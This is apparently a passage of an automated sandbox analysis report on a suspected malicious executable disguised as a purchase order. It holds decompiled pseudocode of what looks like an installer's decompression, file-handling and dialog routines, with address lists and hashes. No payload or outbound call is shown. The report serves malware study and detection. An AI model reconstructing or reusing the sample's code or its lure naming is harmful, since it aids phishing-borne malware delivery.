                      												__ebx = __ebx + __ebx;
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                      												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                      												 *(__ebp - 0x44) = __ebx;
                      												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                      													__ecx =  *(__ebp - 0x10);
                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                      													__ebx = __ebx | 0x00000001;
                      													__eflags = __ebx;
                      													 *(__ebp - 0x44) = __ebx;
                      												}
                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                      												if( *(__ebp - 0x10) >= 0x1000000) {
                      													L101:
                      													_t338 = __ebp - 0x48;
                      													 *_t338 =  *(__ebp - 0x48) - 1;
                      													__eflags =  *_t338;
                      													goto L102;
                      												} else {
                      													goto L99;
                      												}
                      											}
                      											__edx =  *(__ebp - 4);
                      											__eax = __eax - __ebx;
                      											 *(__ebp - 0x40) = __ecx;
                      											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                      											goto L108;
                      										case 0x1a:
                      											L56:
                      											__eflags =  *(__ebp - 0x64);
                      											if( *(__ebp - 0x64) == 0) {
                      												 *(__ebp - 0x88) = 0x1a;
                      												goto L170;
                      											}
                      											__ecx =  *(__ebp - 0x68);
                      											__al =  *(__ebp - 0x5c);
                      											__edx =  *(__ebp - 8);
                      											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                      											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                      											 *( *(__ebp - 0x68)) = __al;
                      											__ecx =  *(__ebp - 0x14);
                      											 *(__ecx +  *(__ebp - 8)) = __al;
                      											__eax = __ecx + 1;
                      											__edx = 0;
                      											_t192 = __eax %  *(__ebp - 0x74);
                      											__eax = __eax /  *(__ebp - 0x74);
                      											__edx = _t192;
                      											goto L79;
                      										case 0x1b:
                      											L75:
                      											__eflags =  *(__ebp - 0x64);
                      											if( *(__ebp - 0x64) == 0) {
                      												 *(__ebp - 0x88) = 0x1b;
                      												goto L170;
                      											}
                      											__eax =  *(__ebp - 0x14);
                      											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      											__eflags = __eax -  *(__ebp - 0x74);
                      											if(__eax >=  *(__ebp - 0x74)) {
                      												__eax = __eax +  *(__ebp - 0x74);
                      												__eflags = __eax;
                      											}
                      											__edx =  *(__ebp - 8);
                      											__cl =  *(__eax + __edx);
                      											__eax =  *(__ebp - 0x14);
                      											 *(__ebp - 0x5c) = __cl;
                      											 *(__eax + __edx) = __cl;
                      											__eax = __eax + 1;
                      											__edx = 0;
                      											_t274 = __eax %  *(__ebp - 0x74);
                      											__eax = __eax /  *(__ebp - 0x74);
                      											__edx = _t274;
                      											__eax =  *(__ebp - 0x68);
                      											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                      											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      											_t283 = __ebp - 0x64;
                      											 *_t283 =  *(__ebp - 0x64) - 1;
                      											__eflags =  *_t283;
                      											 *( *(__ebp - 0x68)) = __cl;
                      											L79:
                      											 *(__ebp - 0x14) = __edx;
                      											goto L80;
                      										case 0x1c:
                      											while(1) {
                      												L123:
                      												__eflags =  *(__ebp - 0x64);
                      												if( *(__ebp - 0x64) == 0) {
                      													break;
                      												}
                      												__eax =  *(__ebp - 0x14);
                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      												__eflags = __eax -  *(__ebp - 0x74);
                      												if(__eax >=  *(__ebp - 0x74)) {
                      													__eax = __eax +  *(__ebp - 0x74);
                      													__eflags = __eax;
                      												}
                      												__edx =  *(__ebp - 8);
                      												__cl =  *(__eax + __edx);
                      												__eax =  *(__ebp - 0x14);
                      												 *(__ebp - 0x5c) = __cl;
                      												 *(__eax + __edx) = __cl;
                      												__eax = __eax + 1;
                      												__edx = 0;
                      												_t414 = __eax %  *(__ebp - 0x74);
                      												__eax = __eax /  *(__ebp - 0x74);
                      												__edx = _t414;
                      												__eax =  *(__ebp - 0x68);
                      												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                      												__eflags =  *(__ebp - 0x30);
                      												 *( *(__ebp - 0x68)) = __cl;
                      												 *(__ebp - 0x14) = _t414;
                      												if( *(__ebp - 0x30) > 0) {
                      													continue;
                      												} else {
                      													L80:
                      													 *(__ebp - 0x88) = 2;
                      													goto L1;
                      												}
                      											}
                      											 *(__ebp - 0x88) = 0x1c;
                      											goto L170;
                      									}
                      								}
                      								L171:
                      								_t535 = _t534 | 0xffffffff;
                      								goto L172;
                      							}
                      						}
                      					}
                      				}
                      			}













                      0x00406761
                      0x00406768
                      0x0040676f
                      0x00406776
                      0x00406776
                      0x00000000
                      0x00406776
                      0x00406745
                      0x00406748
                      0x0040674b
                      0x0040674e
                      0x00406755
                      0x00406699
                      0x00406699
                      0x0040669c
                      0x00000000
                      0x00000000
                      0x00406830
                      0x00406833
                      0x00406734
                      0x00000000
                      0x00000000
                      0x0040646a
                      0x0040646c
                      0x00406473
                      0x00406474
                      0x00406476
                      0x00406479
                      0x00000000
                      0x00000000
                      0x00406481
                      0x00406484
                      0x00406487
                      0x00406489
                      0x0040648b
                      0x0040648b
                      0x0040648c
                      0x0040648f
                      0x00406496
                      0x00406499
                      0x004064a7
                      0x00000000
                      0x00000000
                      0x0040677d
                      0x0040677d
                      0x00406780
                      0x00406787
                      0x00000000
                      0x00000000
                      0x0040678c
                      0x0040678c
                      0x00406790
                      0x004068c8
                      0x00000000
                      0x004068c8
                      0x00406796
                      0x00406799
                      0x0040679c
                      0x004067a0
                      0x004067a3
                      0x004067a9
                      0x004067ab
                      0x004067ab
                      0x004067ab
                      0x004067ae
                      0x004067b1
                      0x004067b1
                      0x004067b1
                      0x004067b1
                      0x004067b4
                      0x004067b4
                      0x004067b8
                      0x00406818
                      0x0040681b
                      0x00406820
                      0x00406821
                      0x00406823
                      0x00406825
                      0x00406828
                      0x00406734
                      0x00406734
                      0x00000000
                      0x0040673a
                      0x00406734
                      0x004067ba
                      0x004067c0
                      0x004067c3
                      0x004067c6
                      0x004067c9
                      0x004067cc
                      0x004067cf
                      0x004067d2
                      0x004067d5
                      0x004067d8
                      0x004067db
                      0x004067f4
                      0x004067f7
                      0x004067fa
                      0x004067fd
                      0x00406801
                      0x00406803
                      0x00406803
                      0x00406804
                      0x00406807
                      0x004067dd
                      0x004067dd
                      0x004067e5
                      0x004067ea
                      0x004067ec
                      0x004067ef
                      0x004067ef
                      0x0040680a
                      0x00406811
                      0x00000000
                      0x00406813
                      0x00000000
                      0x00406813
                      0x00000000
                      0x004064af
                      0x004064b2
                      0x004064e8
                      0x00406618
                      0x00406618
                      0x00406618
                      0x00406618
                      0x0040661b
                      0x0040661b
                      0x0040661e
                      0x00406620
                      0x004068aa
                      0x00000000
                      0x004068aa
                      0x00406626
                      0x00406629
                      0x00000000
                      0x00000000
                      0x0040662f
                      0x00406633
                      0x00406636
                      0x00406636
                      0x00406636
                      0x00000000
                      0x00406636
                      0x004064b4
                      0x004064b6
                      0x004064b8
                      0x004064ba
                      0x004064bd
                      0x004064be
                      0x004064c0
                      0x004064c2
                      0x004064c5
                      0x004064c8
                      0x004064de
                      0x004064e3
                      0x0040651b
                      0x0040651b
                      0x0040651f
                      0x0040654b
                      0x0040654d
                      0x00406554
                      0x00406557
                      0x0040655a
                      0x0040655a
                      0x0040655f
                      0x0040655f
                      0x00406561
                      0x00406564
                      0x0040656b
                      0x0040656e
                      0x0040659b
                      0x0040659b
                      0x0040659e
                      0x004065a1
                      0x00406615
                      0x00406615
                      0x00406615
                      0x00000000
                      0x00406615
                      0x004065a3
                      0x004065a9
                      0x004065ac
                      0x004065af
                      0x004065b2
                      0x004065b5
                      0x004065b8
                      0x004065bb
                      0x004065be
                      0x004065c1
                      0x004065c4
                      0x004065dd
                      0x004065df
                      0x004065e2
                      0x004065e3
                      0x004065e6
                      0x004065e8
                      0x004065eb
                      0x004065ed
                      0x004065ef
                      0x004065f2
                      0x004065f4
                      0x004065f7
                      0x004065fb
                      0x004065fd
                      0x004065fd
                      0x004065fe
                      0x00406601
                      0x00406604
                      0x004065c6
                      0x004065c6
                      0x004065ce
                      0x004065d3
                      0x004065d5
                      0x004065d8
                      0x004065d8
                      0x00406607
                      0x0040660e
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00000000
                      0x00406610
                      0x00000000
                      0x00406610
                      0x0040660e
                      0x00406521
                      0x00406524
                      0x00406526
                      0x00406529
                      0x0040652c
                      0x0040652f
                      0x00406531
                      0x00406534
                      0x00406537
                      0x00406537
                      0x0040653a
                      0x0040653a
                      0x0040653d
                      0x00406544
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00000000
                      0x00406546
                      0x00000000
                      0x00406546
                      0x00406544
                      0x004064ca
                      0x004064cd
                      0x004064cf
                      0x004064d2
                      0x00000000
                      0x00000000
                      0x00406231
                      0x00406231
                      0x00406235
                      0x0040687a
                      0x00000000
                      0x0040687a
                      0x0040623b
                      0x0040623e
                      0x00406241
                      0x00406244
                      0x00406247
                      0x0040624a
                      0x0040624d
                      0x0040624f
                      0x00406252
                      0x00406255
                      0x00406258
                      0x0040625a
                      0x0040625a
                      0x0040625a
                      0x00000000
                      0x00000000
                      0x004063bc
                      0x004063bc
                      0x004063c0
                      0x00406886
                      0x00000000
                      0x00406886
                      0x004063c6
                      0x004063c9
                      0x004063cc
                      0x004063cf
                      0x004063d1
                      0x004063d1
                      0x004063d1
                      0x004063d4
                      0x004063d7
                      0x004063da
                      0x004063dd
                      0x004063e0
                      0x004063e3
                      0x004063e4
                      0x004063e6
                      0x004063e6
                      0x004063e6
                      0x004063e9
                      0x004063ec
                      0x004063ef
                      0x004063f2
                      0x004063f2
                      0x004063f2
                      0x004063f5
                      0x004063f7
                      0x004063f7
                      0x00000000
                      0x00000000
                      0x00406639
                      0x00406639
                      0x00406639
                      0x0040663d
                      0x00000000
                      0x00000000
                      0x00406643
                      0x00406646
                      0x00406649
                      0x0040664c
                      0x0040664e
                      0x0040664e
                      0x0040664e
                      0x00406651
                      0x00406654
                      0x00406657
                      0x0040665a
                      0x0040665d
                      0x00406660
                      0x00406661
                      0x00406663
                      0x00406663
                      0x00406663
                      0x00406666
                      0x00406669
                      0x0040666c
                      0x0040666f
                      0x00406672
                      0x00406676
                      0x00406678
                      0x0040667b
                      0x00000000
                      0x0040667d
                      0x004063fa
                      0x004063fa
                      0x00000000
                      0x004063fa
                      0x0040667b
                      0x004068b0
                      0x00000000
                      0x00000000
                      0x00405edf
                      0x004068e7
                      0x004068e7
                      0x00000000
                      0x004068e7
                      0x00406734
                      0x004066bb
                      0x004066b8

                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
                      • Instruction ID: 03af6c1e27b970ccc0602dedbaa06cf660f45ac3eaa39f8bc43b8226cdf4d636
                      • Opcode Fuzzy Hash: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
                      • Instruction Fuzzy Hash: 46715571D00229DFEF28CF98C844BADBBB1FB44305F15806AD816BB281C7789A96DF44
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 69%
                      			E00401389(signed int _a4) {
                      				intOrPtr* _t6;
                      				void* _t8;
                      				void* _t10;
                      				signed int _t11;
                      				void* _t12;
                      				signed int _t16;
                      				signed int _t17;
                      				void* _t18;
                      
                      				_t17 = _a4;
                      				while(_t17 >= 0) {
                      					_t6 = _t17 * 0x1c +  *0x423ed0;
                      					if( *_t6 == 1) {
                      						break;
                      					}
                      					_push(_t6); // executed
                      					_t8 = E00401434(); // executed
                      					if(_t8 == 0x7fffffff) {
                      						return 0x7fffffff;
                      					}
                      					_t10 = E0040136D(_t8);
                      					if(_t10 != 0) {
                      						_t11 = _t10 - 1;
                      						_t16 = _t17;
                      						_t17 = _t11;
                      						_t12 = _t11 - _t16;
                      					} else {
                      						_t12 = _t10 + 1;
                      						_t17 = _t17 + 1;
                      					}
                      					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                      						 *0x42368c =  *0x42368c + _t12;
                      						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42368c, 0x7530,  *0x423674), 0);
                      					}
                      				}
                      				return 0;
                      			}












                      APIs
                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                      • SendMessageA.USER32 ref: 004013F4
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: MessageSend
                      • String ID:
                      • API String ID: 3850602802-0
                      • Opcode ID: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                      • Instruction ID: b71ad761f0ea07ecc4e6183a90c0cd8288537aab3e92bb5761005deb6e4a9b1f
                      • Opcode Fuzzy Hash: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                      • Instruction Fuzzy Hash: 20014431B24210ABE7291B388D08B2A32ADE714315F10423FF801F32F0D678DC028B4C
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 68%
                      			E0040575C(CHAR* _a4, long _a8, long _a12) {
                      				signed int _t5;
                      				void* _t6;
                      
                      				_t5 = GetFileAttributesA(_a4); // executed
                      				asm("sbb ecx, ecx");
                      				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                      				return _t6;
                      			}






                      APIs
                      • GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\user\Desktop\Purchase Order #5000012803.exe,80000000,00000003), ref: 00405760
                      • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: File$AttributesCreate
                      • String ID:
                      • API String ID: 415043291-0
                      • Opcode ID: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                      • Instruction ID: 90a47e22fdd321f70bf06df01bfdefa11f3e73682391c7296034eb3a8fe04f39
                      • Opcode Fuzzy Hash: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                      • Instruction Fuzzy Hash: 8CD09E31658301AFEF098F20DD1AF2E7AA2EB84B00F10562CB646940E0D6715815DB16
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0040573D(CHAR* _a4) {
                      				signed char _t3;
                      
                      				_t3 = GetFileAttributesA(_a4); // executed
                      				if(_t3 != 0xffffffff) {
                      					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
                      				}
                      				return _t3;
                      			}





                      APIs
                      • GetFileAttributesA.KERNELBASE(?,00405548,?,?,?), ref: 00405741
                      • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405753
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: AttributesFile
                      • String ID:
                      • API String ID: 3188754299-0
                      • Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                      • Instruction ID: 88d4634cff9a4ddd1fee40d2dea465eb4d792ab4199cb35d7d0d1e1f6e6e1bf9
                      • Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                      • Instruction Fuzzy Hash: CAC04CB1808501EBD6016B24DF0D81F7B66EB50321B108B35F569E00F0C7755C66EA1A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E004031A8(void* _a4, long _a8) {
                      				int _t6;
                      				long _t10;
                      
                      				_t10 = _a8;
                      				_t6 = ReadFile( *0x409010, _a4, _t10,  &_a8, 0); // executed
                      				if(_t6 == 0 || _a8 != _t10) {
                      					return 0;
                      				} else {
                      					return 1;
                      				}
                      			}






                      APIs
                      • ReadFile.KERNELBASE(00409128,00000000,00000000,00000000,00413038,0040B038,004030AD,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000), ref: 004031BF
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: FileRead
                      • String ID:
                      • API String ID: 2738559852-0
                      • Opcode ID: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                      • Instruction ID: b8f1ad64850fa721b7c3123cc302f733781f6218d307da9d2aa6486ecc23217a
                      • Opcode Fuzzy Hash: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                      • Instruction Fuzzy Hash: 4BE08632254119BBCF105E619C00AD73F5CEB0A3A2F008432FD55E9190D230EA11DBA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E004031DA(long _a4) {
                      				long _t2;
                      
                      				_t2 = SetFilePointer( *0x409010, _a4, 0, 0); // executed
                      				return _t2;
                      			}





                      APIs
                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,?), ref: 004031E8
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: FilePointer
                      • String ID:
                      • API String ID: 973152223-0
                      • Opcode ID: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                      • Instruction ID: 0cdacc43d416a0c3c320ce55ce8d4373a9ea66752a7e2c64ddc4eeaf6ba3fa4d
                      • Opcode Fuzzy Hash: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                      • Instruction Fuzzy Hash: 49B01271644200BFDA214F00DF05F057B31B790700F108430B394380F082712420EB0D
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Non-executed Functions

                      C-Code - Quality: 95%
                      			E00404F61(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                      				struct HWND__* _v8;
                      				long _v12;
                      				struct tagRECT _v28;
                      				void* _v36;
                      				signed int _v40;
                      				int _v44;
                      				int _v48;
                      				signed int _v52;
                      				int _v56;
                      				void* _v60;
                      				void* _v68;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				long _t87;
                      				unsigned int _t92;
                      				int _t94;
                      				int _t95;
                      				void* _t101;
                      				intOrPtr _t112;
                      				intOrPtr _t123;
                      				struct HWND__* _t127;
                      				int _t149;
                      				int _t150;
                      				struct HWND__* _t154;
                      				struct HWND__* _t158;
                      				struct HMENU__* _t160;
                      				long _t162;
                      				void* _t163;
                      				short* _t164;
                      
                      				_t154 =  *0x423684;
                      				_t149 = 0;
                      				_v8 = _t154;
                      				if(_a8 != 0x110) {
                      					if(_a8 == 0x405) {
                      						CloseHandle(CreateThread(0, 0, E00404EF5, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                      					}
                      					if(_a8 != 0x111) {
                      						L17:
                      						if(_a8 != 0x404) {
                      							L25:
                      							if(_a8 != 0x7b || _a12 != _t154) {
                      								goto L20;
                      							} else {
                      								_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
                      								_a8 = _t87;
                      								if(_t87 <= _t149) {
                      									L37:
                      									return 0;
                      								}
                      								_t160 = CreatePopupMenu();
                      								AppendMenuA(_t160, _t149, 1, E00405AA7(_t149, _t154, _t160, _t149, 0xffffffe1));
                      								_t92 = _a16;
                      								if(_t92 != 0xffffffff) {
                      									_t150 = _t92;
                      									_t94 = _t92 >> 0x10;
                      								} else {
                      									GetWindowRect(_t154,  &_v28);
                      									_t150 = _v28.left;
                      									_t94 = _v28.top;
                      								}
                      								_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
                      								_t162 = 1;
                      								if(_t95 == 1) {
                      									_v60 = _t149;
                      									_v48 = 0x420498;
                      									_v44 = 0xfff;
                      									_a4 = _a8;
                      									do {
                      										_a4 = _a4 - 1;
                      										_t162 = _t162 + SendMessageA(_v8, 0x102d, _a4,  &_v68) + 2;
                      									} while (_a4 != _t149);
                      									OpenClipboard(_t149);
                      									EmptyClipboard();
                      									_t101 = GlobalAlloc(0x42, _t162);
                      									_a4 = _t101;
                      									_t163 = GlobalLock(_t101);
                      									do {
                      										_v48 = _t163;
                      										_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
                      										 *_t164 = 0xa0d;
                      										_t163 = _t164 + 2;
                      										_t149 = _t149 + 1;
                      									} while (_t149 < _a8);
                      									GlobalUnlock(_a4);
                      									SetClipboardData(1, _a4);
                      									CloseClipboard();
                      								}
                      								goto L37;
                      							}
                      						}
                      						if( *0x42366c == _t149) {
                      							ShowWindow( *0x423ea8, 8);
                      							if( *0x423f2c == _t149) {
                      								_t112 =  *0x41fc68; // 0x0
                      								E00404E23( *((intOrPtr*)(_t112 + 0x34)), _t149);
                      							}
                      							E00403E10(1);
                      							goto L25;
                      						}
                      						 *0x41f860 = 2;
                      						E00403E10(0x78);
                      						goto L20;
                      					} else {
                      						if(_a12 != 0x403) {
                      							L20:
                      							return E00403E9E(_a8, _a12, _a16);
                      						}
                      						ShowWindow( *0x423670, _t149);
                      						ShowWindow(_t154, 8);
                      						E00403E6C(_t154);
                      						goto L17;
                      					}
                      				}
                      				_v52 = _v52 | 0xffffffff;
                      				_v40 = _v40 | 0xffffffff;
                      				_v60 = 2;
                      				_v56 = 0;
                      				_v48 = 0;
                      				_v44 = 0;
                      				asm("stosd");
                      				asm("stosd");
                      				_t123 =  *0x423eb0;
                      				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
                      				_a12 =  *((intOrPtr*)(_t123 + 0x60));
                      				 *0x423670 = GetDlgItem(_a4, 0x403);
                      				 *0x423668 = GetDlgItem(_a4, 0x3ee);
                      				_t127 = GetDlgItem(_a4, 0x3f8);
                      				 *0x423684 = _t127;
                      				_v8 = _t127;
                      				E00403E6C( *0x423670);
                      				 *0x423674 = E004046C5(4);
                      				 *0x42368c = 0;
                      				GetClientRect(_v8,  &_v28);
                      				_v52 = _v28.right - GetSystemMetrics(0x15);
                      				SendMessageA(_v8, 0x101b, 0,  &_v60);
                      				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                      				if(_a8 >= 0) {
                      					SendMessageA(_v8, 0x1001, 0, _a8);
                      					SendMessageA(_v8, 0x1026, 0, _a8);
                      				}
                      				if(_a12 >= _t149) {
                      					SendMessageA(_v8, 0x1024, _t149, _a12);
                      				}
                      				_push( *((intOrPtr*)(_a16 + 0x30)));
                      				_push(0x1b);
                      				E00403E37(_a4);
                      				if(( *0x423eb8 & 0x00000003) != 0) {
                      					ShowWindow( *0x423670, _t149);
                      					if(( *0x423eb8 & 0x00000002) != 0) {
                      						 *0x423670 = _t149;
                      					} else {
                      						ShowWindow(_v8, 8);
                      					}
                      					E00403E6C( *0x423668);
                      				}
                      				_t158 = GetDlgItem(_a4, 0x3ec);
                      				SendMessageA(_t158, 0x401, _t149, 0x75300000);
                      				if(( *0x423eb8 & 0x00000004) != 0) {
                      					SendMessageA(_t158, 0x409, _t149, _a12);
                      					SendMessageA(_t158, 0x2001, _t149, _a8);
                      				}
                      				goto L37;
                      			}

                      APIs
                      • GetDlgItem.USER32 ref: 00404FC0
                      • GetDlgItem.USER32 ref: 00404FCF
                      • GetClientRect.USER32 ref: 0040500C
                      • GetSystemMetrics.USER32 ref: 00405014
                      • SendMessageA.USER32 ref: 00405035
                      • SendMessageA.USER32 ref: 00405046
                      • SendMessageA.USER32 ref: 00405059
                      • SendMessageA.USER32 ref: 00405067
                      • SendMessageA.USER32 ref: 0040507A
                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040509C
                      • ShowWindow.USER32(?,00000008), ref: 004050B0
                      • GetDlgItem.USER32 ref: 004050D1
                      • SendMessageA.USER32 ref: 004050E1
                      • SendMessageA.USER32 ref: 004050FA
                      • SendMessageA.USER32 ref: 00405106
                      • GetDlgItem.USER32 ref: 00404FDE
                        • Part of subcall function 00403E6C: SendMessageA.USER32 ref: 00403E7A
                      • GetDlgItem.USER32 ref: 00405123
                      • CreateThread.KERNEL32(00000000,00000000,Function_00004EF5,00000000), ref: 00405131
                      • CloseHandle.KERNEL32(00000000), ref: 00405138
                      • ShowWindow.USER32(00000000), ref: 0040515C
                      • ShowWindow.USER32(?,00000008), ref: 00405161
                      • ShowWindow.USER32(00000008), ref: 004051A8
                      • SendMessageA.USER32 ref: 004051DA
                      • CreatePopupMenu.USER32 ref: 004051EB
                      • AppendMenuA.USER32 ref: 00405200
                      • GetWindowRect.USER32 ref: 00405213
                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405237
                      • SendMessageA.USER32 ref: 00405272
                      • OpenClipboard.USER32(00000000), ref: 00405282
                      • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405288
                      • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405291
                      • GlobalLock.KERNEL32 ref: 0040529B
                      • SendMessageA.USER32 ref: 004052AF
                      • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004052C7
                      • SetClipboardData.USER32(00000001,00000000), ref: 004052D2
                      • CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 004052D8
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
